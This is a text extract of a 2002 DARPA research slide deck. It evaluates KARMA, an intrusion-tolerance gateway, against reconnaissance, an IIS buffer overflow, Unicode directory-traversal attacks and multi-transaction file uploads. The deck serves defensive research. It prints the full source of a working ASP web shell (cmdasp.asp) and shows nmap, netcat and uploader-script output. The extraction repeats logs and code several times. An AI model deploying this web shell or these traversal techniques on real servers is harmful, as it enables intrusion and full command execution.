DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 1 Aegis Research Corporation KARMA Kinetic Application of Redundancy to Mitigate Attacks (Intrusion Tolerance Using Masking, Redundancy and Dispersion) DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Janet Lepanto William Weinstein The Charles Stark Draper Laboratory, Inc. Aegis Research Corporation ® Aegis Research Corporation

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 2 Aegis Research Corporation Overview Objectives and Assumptions Preliminary Test Results Validation Test Strategy

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 3 Aegis Research Corporation Objectives and Assumptions Objectives –Employ only a small set of trusted components to protect a large set of untrusted unmodified COTS servers and databases –Minimize loss of data confidentiality and integrity in the presence of a successful attack on one of the servers –Tolerate attacks whose specific signatures are not known a priori Assumptions –Attacker desires stealth so transaction rates will be relatively low –Attacks employing high transaction rates and recognizable signatures will be addressed by front-end firewalls and/or other intrusion detection mechanisms –Exploitation of latent vulnerabilities will require more than a single transaction

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 4 Aegis Research Corporation Architecture External WAN External Firewall Data Base Transaction Mediator Gateway Switched IP Server (1) Server (N) Server (2) Configuration Manager Switched IP COTS Trusted Other

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 5 Aegis Research Corporation Mechanisms Gateway –Mask identities of origin server operating systems and web server applications –Distribute client transactions among the origin servers such that the client cannot predict which server will handle a transaction Configuration Manager –Monitor status of origin servers (via agent on each server) for anomalies –Reconfigure server to “clean” state if anomalies are detected Transaction Mediator –Log transactions to back-end database to support rollback recovery

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 6 Aegis Research Corporation KARMA Preliminary Testing Discovery –OS identification –Web server enumeration –Probing with malformed request Web Server Exploitation –Buffer overflow exploit to get shell command –Unicode exploit –Multi-transaction Unicode attack to plant executable –Smart multi-transaction attack with server agents active

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 7 Aegis Research Corporation OS identification attempts to guess the operating system and version of a remote system Freely available programs used for OS identification include xprobe (icmp based), queso, and nmap By identifying the specific operating system of a target platform, a hacker can focus the attack, minimizing time and attack signatures KARMA masks OS identity of the Gateway Discovery (OS Identification) Gateway Configuration Manager Server (2) Server (1) Server (N)

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 8 Aegis Research Corporation Unable to determine OS of remote system Time required for this activity is relatively long OS identification run against KARMA public IP address Discovery (OS Identification) Starting nmap V by ( ) Interesting ports on ( ): Port State Service 80/tcp open http TCP Sequence Prediction: Class=random positive increments Difficulty=38245 (Worthy challenge) No OS matches for host (If you know what OS is running on it, see Nmap run completed – 1 IP address (1 hosts up) scanned in 24 seconds With-KARMA]# nmap -sT -n -r –p 80 -P0 -O its.c4i.draper.com Starting nmap V by ( ) Interesting ports on ( ): Port State Service 80/tcp open http TCP Sequence Prediction: Class=random positive increments Difficulty=38245 (Worthy challenge) No OS matches for host (If you know what OS is running on it, see

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 9 Aegis Research Corporation Web server enumeration attempts to remotely determine the currently running version of web server software In response to a HEAD command, web servers typically reveal the version of the software in the “Server” field of the HTTP response Successful enumeration allows a hacker to focus the attack against the specific web server software KARMA scrubs web server responses to mask the identity of the responding web server Removes specific identifying information (e.g., “Server” header) Removes server unique information such as E-tags Reformats error responses to mask server unique implementations Discovery (Web Server Enumeration) Gateway Configuration Manager Server (2) Server (1) Server (N)

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 10 Aegis Research Corporation Issue the HEAD command to the server “Server” field identifies the server as Microsoft-IIS/4.0 Probe web server directly Discovery (Web Server Enumeration) Without-KARMA]# nc HTTP/ OK Server: Microsoft-IIS/4.0 Content-Location: Date: Fri, 04 Jan :41:23 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Wed, 02 Jan :36:45 GMT ETag: "804e5a95c5ec11:b84" Content-Length: 6783 Server: Microsoft-IIS/4.0 HEAD / HTTP/1.0

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 11 Aegis Research Corporation Issue the HEAD command to the server “Server” field no longer present in the HTTP response Probe web server via KARMA Discovery (Web Server Enumeration) With-KARMA]# nc its.c4i.draper.com 80 HTTP/ OK Connection: close Date: Fri, 04 Jan :40:28 GMT Accept-Ranges: bytes Content-Length: 6913 Content-Type: text/html Last-Modified: Wed, 02 Jan :36:45 GMT HEAD / HTTP/1.0

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 12 Aegis Research Corporation System often discloses information when responding to erroneous conditions Attackers can trigger such disclosure and use the information to create a blueprint of the target network Upon receiving a malformed request to an existing directory the web server responds with an error message that contains its internal IP address KARMA sanitizes error responses from the web servers and and then forwards them to the user Discovery (Probing with a Malformed Request) Gateway Configuration Manager Server (2) Server (1) Server (N)

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 13 Aegis Research Corporation The web server returns a “302 Object Moved” error Error message contains the internal IP address Issue “GET /html” directly to an origin server Discovery (Probing with a Malformed Request) HTTP/ Object Moved Location: Server: Microsoft-IIS/4.0 Content-Type: text/html Content-Length: 141 Document Moved Object Moved This document may be found here Without-KARMA]# nc GET /html HTTP/1.0 HTTP/ Object Moved Location: Server: Microsoft-IIS/4.0 Content-Type: text/html Content-Length: 141 Document Moved Object Moved This document may be found here

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 14 Aegis Research Corporation Web server returns a “301 Moved Permanently” error Error message does not contain internal IP address Issue “GET /html” via KARMA Discovery (Probing with a Malformed Request) HTTP/ Moved Permanently Connection: close Location: Content-Length: Moved Permanently With-KARMA]# nc its.c4i.draper.com 80 GET /html HTTP/1.0 HTTP/ Moved Permanently Connection: close Location: Content-Length: Moved Permanently

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 15 Aegis Research Corporation Windows 2000 Internet printing ISAPI extension is vulnerable to a buffer overflow exploit Exploit causes buffer overflow on the IIS web server which returns a command shell to attacker on TCP port 81 This command shell has administrator level access, enabling the attacker to modify all data on the machine and launch additional attacks from the compromised server Web Server Exploitation (Buffer Overflow) Gateway Configuration Manager Server (2) Server (1) Server (N)

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 16 Aegis Research Corporation Command shell returned from server “ver” command returns the version of windows Execute directly against server and listen for shell on port 81 Web Server Exploitation (Buffer Overflow) “ipconfig /all” reports the server’s network configuration

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 17 Aegis Research Corporation Unsuccessful, command shell is never returned Attack is thwarted Execute via KARMA and listen for shell on port 81 Web Server Exploitation (Buffer Overflow)

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 18 Aegis Research Corporation Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot “../” directory traversal exploitation if extended Unicode character representations are used in substitution for “/” and “\” (such as %c0 and %af) This vulnerability enables unauthenticated to access any known file or program on the web server Successful exploitation would yield the same privileges as a user who could remotely log onto the system with no credentials Web Server Exploitation (Unicode Exploit) Gateway Configuration Manager Server (2) Server (1) Server (N)

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 19 Aegis Research Corporation “dir c:\” reveals the contents of the root directory “ver” command returns the version of windows Execute Unicode attack directly against server Web Server Exploitation (Unicode Exploit)

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 20 Aegis Research Corporation “dir c:\” sent to server several times before success “ver” returns error message for every request Execute Unicode attack via KARMA Web Server Exploitation (Unicode Exploit)

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 21 Aegis Research Corporation A multi-transaction Unicode attack requires a sequence of successful Unicode requests (transactions). For example, uploading a file line by line using the windows “echo” command Attacker uploads for exploit the web server. cmdasp.asp (exploit allows the attacker to execute commands with system level privileges) upload.asp (script allows an attacker to upload files via HTTP) KARMA dispersion makes multi-transaction attacks more difficult Increases the time required to exploit the web server Increases the attack signature and probability of detection Web Server Exploitation (Multi-Transaction) Gateway Configuration Manager Server (2) Server (1) Server (N)

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 22 Aegis Research Corporation Web Server Exploitation (Multi-Transaction) unicodeloader.pl uploads the file cmdasp.asp line by line utilizing the “echo” command in multiple Unicode strings cmdasp.asp – web script to exploit local windows vulnerability that enables the attacker to execute commands with system level privileges Attacker accesses cmdasp.asp with a web browser and enters commands

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 23 Aegis Research Corporation Web Server Exploitation (Multi-Transaction) Attack web server directly

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 24 Aegis Research Corporation Web Server Exploitation (Multi-Transaction) Attack web servers via KARMA

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 25 Aegis Research Corporation “cmdasp.asp” with KARMA 3 - Dim oScriptNet 10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 13 - szTempFile = "C:\" & oFileSys.GetTempName( ) 17 - %> 20 - " method="POST"> If (IsObject(oFile)) Then 32 - Call oFileSys.DeleteFile(szTempFile, True) 36 - “cmdasp.asp” without KARMA <% 3 - Dim oScript 4 - Dim oScriptNet 5 - Dim oFileSys, oFile 6 - Dim szCMD, szTempFile 7 - On Error Resume Next 8 - Set oScript = Server.CreateObject("WSCRIPT.SHELL") 9 - Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 11 - szCMD = Request.Form(".CMD") 12 - If (szCMD <> "") Then 13 - szTempFile = "C:\" & oFileSys.GetTempName( ) 14 - Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 15 - Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 16 - End If 17 - %> " method="POST"> 21 - "> <% 28 - If (IsObject(oFile)) Then 29 - On Error Resume Next 30 - Response.Write Server.HTMLEncode(oFile.ReadAll) 31 - oFile.Close 32 - Call oFileSys.DeleteFile(szTempFile, True) 33 - End If 34 - %> Web Server Exploitation (Multi-Transaction) “cmdasp.asp” without KARMA <% 3 - Dim oScript 4 - Dim oScriptNet 5 - Dim oFileSys, oFile 6 - Dim szCMD, szTempFile 7 - On Error Resume Next 8 - Set oScript = Server.CreateObject("WSCRIPT.SHELL") 9 - Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 11 - szCMD = Request.Form(".CMD") 12 - If (szCMD <> "") Then 13 - szTempFile = "C:\" & oFileSys.GetTempName( ) 14 - Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 15 - Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 16 - End If 17 - %> " method="POST"> 21 - "> <% 28 - If (IsObject(oFile)) Then 29 - On Error Resume Next 30 - Response.Write Server.HTMLEncode(oFile.ReadAll) 31 - oFile.Close 32 - Call oFileSys.DeleteFile(szTempFile, True) 33 - End If 34 - %> “cmdasp.asp” with KARMA 3 - Dim oScriptNet 10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 13 - szTempFile = "C:\" & oFileSys.GetTempName( ) 17 - %> 20 - " method="POST"> If (IsObject(oFile)) Then 32 - Call oFileSys.DeleteFile(szTempFile, True) 36 -

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 26 Aegis Research Corporation An attacker with detailed knowledge of the KARMA environment can initiate an advanced multi-transaction Unicode attack with error checking. Upload a line of the script and then recursively checks for success Create unique directory and “echo” first line of script Check unique directory for file size to verify successful upload If successful “echo” line two and continue process else retry first line Server Agent detects changes to origin server configuration Server stopped and taken out of service by Configuration Manager Rebuilt from trusted archive Returned to service Web Server Exploitation (KARMA Server Agents Active) Gateway Configuration Manager Server (2) Server (1) Server (N)

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 27 Aegis Research Corporation Web Server Exploitation (KARMA Server Agents Active) exploiting directory: C:\Inetpub\scripts\adv-uniloader uploading ASP section: sending line 1 of 36 Checking directory for upload.. Line uploaded SUCCESSFULL. cmdasp.asp is now 4482 bytes. Advanced Unicode upload utility with error checking With-KARMA]# adv-uniloader.pl :80 cmdasp.asp First line successfully uploaded to server on first attempt Second line fails several times due to dispersion mechanism Agent identifies attack and shuts down server exploiting directory: C:\Inetpub\scripts\adv-uniloader uploading ASP section: sending line 1 of 36 Checking directory for upload.. Line uploaded SUCCESSFULL. cmdasp.asp is now 4482 bytes. sending line 2 of 36 Checking directory for upload.. Upload NOT successfull cmdasp.asp is still 4482 bytes sending line 2 of 36 Checking directory for upload.. Upload NOT successfull cmdasp.asp is still 4482 bytes sending line 2 of 36 Checking directory for upload.. Line uploaded SUCCESSFULL. cmdasp.asp is now 4487 bytes. exploiting directory: C:\Inetpub\scripts\adv-uniloader uploading ASP section: sending line 1 of 36 Checking directory for upload.. Line uploaded SUCCESSFULL. cmdasp.asp is now 4482 bytes. sending line 2 of 36 Checking directory for upload.. Upload NOT successfull cmdasp.asp is still 4482 bytes sending line 2 of 36 Checking directory for upload.. Upload NOT successfull cmdasp.asp is still 4482 bytes sending line 2 of 36 Checking directory for upload.. Line uploaded SUCCESSFULL. cmdasp.asp is now 4487 bytes. sending line 3 of 36 Checking directory for upload..

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 28 Aegis Research Corporation Web Server Exploitation (KARMA Server Agent Log) Server 4 Agent log file No anomalies detected by the Server Agent on server 4 Attack detected, stop server, refresh content to original data, and restart web service Attack remediated, server 4 back to normal operation in tier 3: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 1 connection to CM closed: fd=164 The World Wide Web Publishing Service service is stopping.got cleanup_restart command The World Wide Web Publishing Service service was stopped successfully. The IIS Admin Service service is stopping... The IIS Admin Service service was stopped successfully. The Content Index service is stopping. The Content Index service was stopped successfully. The Content Index service is starting. The Content Index service was started successfully. The World Wide Web Publishing Service service is starting... The World Wide Web Publishing Service service was started successfully. in osa: need to refresh tier 1 in osa: need to refresh tier 2 in osa: need to refresh tier 3 in osa: need to refresh tier 4 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 3: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 1 connection to CM closed: fd=164 The World Wide Web Publishing Service service is stopping.got cleanup_restart command The World Wide Web Publishing Service service was stopped successfully. The IIS Admin Service service is stopping... The IIS Admin Service service was stopped successfully. The Content Index service is stopping. The Content Index service was stopped successfully. The Content Index service is starting. The Content Index service was started successfully. The World Wide Web Publishing Service service is starting... The World Wide Web Publishing Service service was started successfully. in osa: need to refresh tier 1 in osa: need to refresh tier 2 in osa: need to refresh tier 3 in osa: need to refresh tier 4 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 3: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 1 connection to CM closed: fd=164 The World Wide Web Publishing Service service is stopping.got cleanup_restart command The World Wide Web Publishing Service service was stopped successfully. The IIS Admin Service service is stopping... The IIS Admin Service service was stopped successfully. The Content Index service is stopping. The Content Index service was stopped successfully. The Content Index service is starting. The Content Index service was started successfully. The World Wide Web Publishing Service service is starting... The World Wide Web Publishing Service service was started successfully. in osa: need to refresh tier 1 in osa: need to refresh tier 2 in osa: need to refresh tier 3 in osa: need to refresh tier 4 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 3: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 0 in tier 2: tier completion reporting, verbosity 1, failures 1 connection to CM closed: fd=164 The World Wide Web Publishing Service service is stopping.got cleanup_restart command The World Wide Web Publishing Service service was stopped successfully. The IIS Admin Service service is stopping... The IIS Admin Service service was stopped successfully. The Content Index service is stopping. The Content Index service was stopped successfully. The Content Index service is starting. The Content Index service was started successfully. The World Wide Web Publishing Service service is starting... The World Wide Web Publishing Service service was started successfully. in osa: need to refresh tier 1 in osa: need to refresh tier 2 in osa: need to refresh tier 3 in osa: need to refresh tier 4 in tier 2: tier completion reporting, verbosity 1, failures 0

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 29 Aegis Research Corporation : : : : : : : : : : : : : : : : : : : : : : : : : : : c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref= :0 gath= : : : : : : : : : : : : : c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref= :0 gath= : : : : : : : : : : : : : : : : : : : Web Server Exploitation (KARMA Configuration Manager Log) Configuration Manager log file Server agents reporting OK Problem identified by server 4, unauthorized file c:\inetpub\scripts\a dvuni\cmdasp.asp detected Server 4 back to normal operation, servers reporting OK : : : : : : : : : : : : : : : : : : : : : : : : : : : c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref= :0 gath= : : : : : : : : : : : : : c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref= :0 gath= : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref= :0 gath= : : : : : : : : : : : : : c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref= :0 gath= : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref= :0 gath= : : : : : : : : : : : : : c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref= :0 gath= : : : : : : : : : : : : : : : : : : :

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 30 Aegis Research Corporation Summary of Preliminary Test Results Discovery –Scanning tools could not determine OS of Gateway Origin servers not directly exposed to OS scans –Probing to create web servers error responses failed to uncover web server type Web Server Exploitation –Buffer overflow of printing extension failed to return command shell –Execution of single string Unicode exploits slowed by dispersion mechanism KARMA architecture rendered some “pseudo shell commands” ineffective Exploit was able to return directory information –Multi-transaction file buildup thwarted by dispersion mechanism –Smart multi-transaction file buildup stopped by server agent

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002Slide 31 Aegis Research Corporation Validation Test Strategy Controlled Vulnerability Testing Configure origin servers with known weaknesses Compare effect of attacks directly on server with same attack via KARMA Blind Red Team Testing Configure origin servers with latest security patches Give the Red team no information at all about the system Objective is to compromise the data base Targeted Red Team Testing Configure origin servers with latest security patches Inform the red team about the general architecture and operating strategy, but provide no details Objective is to compromise the data base